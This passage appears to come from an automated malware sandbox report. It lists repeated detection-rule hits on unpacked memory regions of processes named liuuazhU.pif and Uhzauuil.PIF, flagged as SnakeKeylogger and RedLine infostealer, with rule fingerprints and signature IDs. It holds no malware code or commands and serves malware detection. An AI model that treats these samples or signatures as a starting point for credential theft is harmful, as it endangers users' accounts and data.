            Source: 11.2.liuuazhU.pif.2bd36478.9.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2bd36478.9.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 1.2.x.exe.21751178.9.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 11.2.liuuazhU.pif.43d038.1.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 6.2.liuuazhU.pif.1f8a0000.9.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2aa80f08.6.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1f8a0000.9.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1e426478.7.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.1.liuuazhU.pif.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.2.liuuazhU.pif.1d824590.10.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1d03772e.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2a99772e.4.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2a996826.3.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.1d7f6478.9.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2bd35570.8.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2bd35570.8.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2a996826.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1d03772e.3.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.1d7f5570.8.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.1c760000.7.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.43d038.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.2.liuuazhU.pif.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.2.liuuazhU.pif.1d7f6478.9.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2ab30000.7.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.1c560000.5.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1d036826.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.1c760000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1d3a0000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.1.liuuazhU.pif.43d038.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 11.2.liuuazhU.pif.2bd64590.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.1c17772e.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.476068.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 6.2.liuuazhU.pif.1e425570.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.43d038.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.2.liuuazhU.pif.1c560000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1e425570.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.1.liuuazhU.pif.476068.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 11.2.liuuazhU.pif.2bd64590.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.2.liuuazhU.pif.1c176826.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2aa80000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.2.liuuazhU.pif.1c560f08.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.2.liuuazhU.pif.1c176826.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1e426478.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.3.liuuazhU.pif.28cff190.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1d3a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1e454590.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.1.liuuazhU.pif.476068.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 6.1.liuuazhU.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.2.liuuazhU.pif.1d824590.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1d3a0f08.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.3.liuuazhU.pif.1a55c2f8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.2.liuuazhU.pif.1e454590.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2aa80000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 6.2.liuuazhU.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 6.2.liuuazhU.pif.1d036826.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.1.liuuazhU.pif.43d038.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 11.2.liuuazhU.pif.2a99772e.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.1.liuuazhU.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 10.2.Uhzauuil.PIF.20f96fd8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 6.3.liuuazhU.pif.1b37a088.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2ab30000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 10.2.Uhzauuil.PIF.20f5dfa8.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 11.3.liuuazhU.pif.28cff190.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.1.liuuazhU.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.3.liuuazhU.pif.1a55c2f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 10.2.Uhzauuil.PIF.20f5dfa8.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
